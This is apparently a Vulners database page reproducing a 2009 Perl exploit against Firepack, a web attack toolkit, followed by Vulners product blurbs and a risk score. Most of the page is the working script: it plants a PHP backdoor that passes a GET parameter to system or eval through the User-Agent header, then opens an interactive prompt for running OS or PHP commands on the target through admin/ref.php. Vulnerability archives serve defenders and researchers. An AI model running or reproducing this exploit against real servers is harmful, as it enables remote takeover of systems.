Vulners
Lucene search
Firepack (admin/ref.php) Remote Code Execution Exploit
======================================================
Firepack (admin/ref.php) Remote Code Execution Exploit
======================================================
#!/usr/bin/perl
#
# Firepack - Remote Command\Code Execution Exploit
#
# Firepack is a web atting toolkit often used in 2008, when the most
# versions of it were published. A short time ago i looked though the
# sourcecode and noticed that Vulnerability which can be used
# if the admin doesn't use a .htaccess protection in his admin area.
# WARNING: When accessing the index.php, malware could be executed
# so i recommend to execute it in a virtual environment.
# Username and password are located in config.php in the main folder
print("
################################################
Firepack - Remote Command/Code Execution Exploit
Date: 17.02.2009
Vulnerability discovered by: Lidloses_Auge
Exploit coded by: Lidloses_Auge
Greetz to: -=Player=- , Suicide,
g4ms3, enco, Palme, GPM,
karamble, Free-Hack
################################################
Use:
1) Your enemy
URL (e.g. http://localhost/FirePack/)
2) Weapons
1 = Remote Command Execution (OS Commands)
2 = Remote Code Execution (PHP Commands)
################################################
Select the enemy now:
\t");
$enemy = <STDIN>;
$enemy = substr($enemy,0,length($enemy)-1);
print "\nChoose your weapon!\n\n\t";
$choice = <STDIN>;
$choice = substr($choice,0,length($choice)-1);
if ($choice == 1 | $choice == 2) {
print "\n>>> Entering the ship!";
use LWP::Simple;
use LWP::UserAgent;
my $ua = LWP::UserAgent->new;
$param[0] = "cmd";
$param[1] = "code";
$param[2] = "system";
$param[3] = "eval";
$code = "<?php if(isset(\$_GET['$param[$choice-1]'])){echo 'fp_$param[$choice-1]1';$param[$choice+1](\$_GET['$param[$choice-1]']);echo 'fp_$param[$choice-1]2';die;} ?>";
$ua->agent($code);
$req = HTTP::Request->new(GET => $enemy."index.php");
$req->header('Accept' => 'text/html');
$res = $ua->request($req);
if (!($res->is_success)) {
print "\nFailed! Wrong enemy dude?\n";
} else {
print "\nWelcome aboard, warrior! Try some commands ('quit' to exit):";
$splitlen = length("fp_".$param[$choice-1])+1;
$key = "fp_".$param[$choice-1];
while (substr($cmd,0,length($cmd)-1) ne "quit") {
print "\n\n>Do: ";
$cmd = <STDIN>;
if (substr($cmd,0,length($cmd)-1) ne "quit") {
$src = get($enemy."admin/ref.php?$param[$choice-1]=$cmd");
print "\n".substr($src,index($src,$key."1")+$splitlen,index($src,$key."2")-index($src,$key."1")-$splitlen);
}
}
}
} else {
print "\nWanna fight without weapon? No way dude!";
}
# 0day.today [2018-04-09] #Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
18 Feb 2009 00:00Current
7.1High risk
Vulners AI Score7.1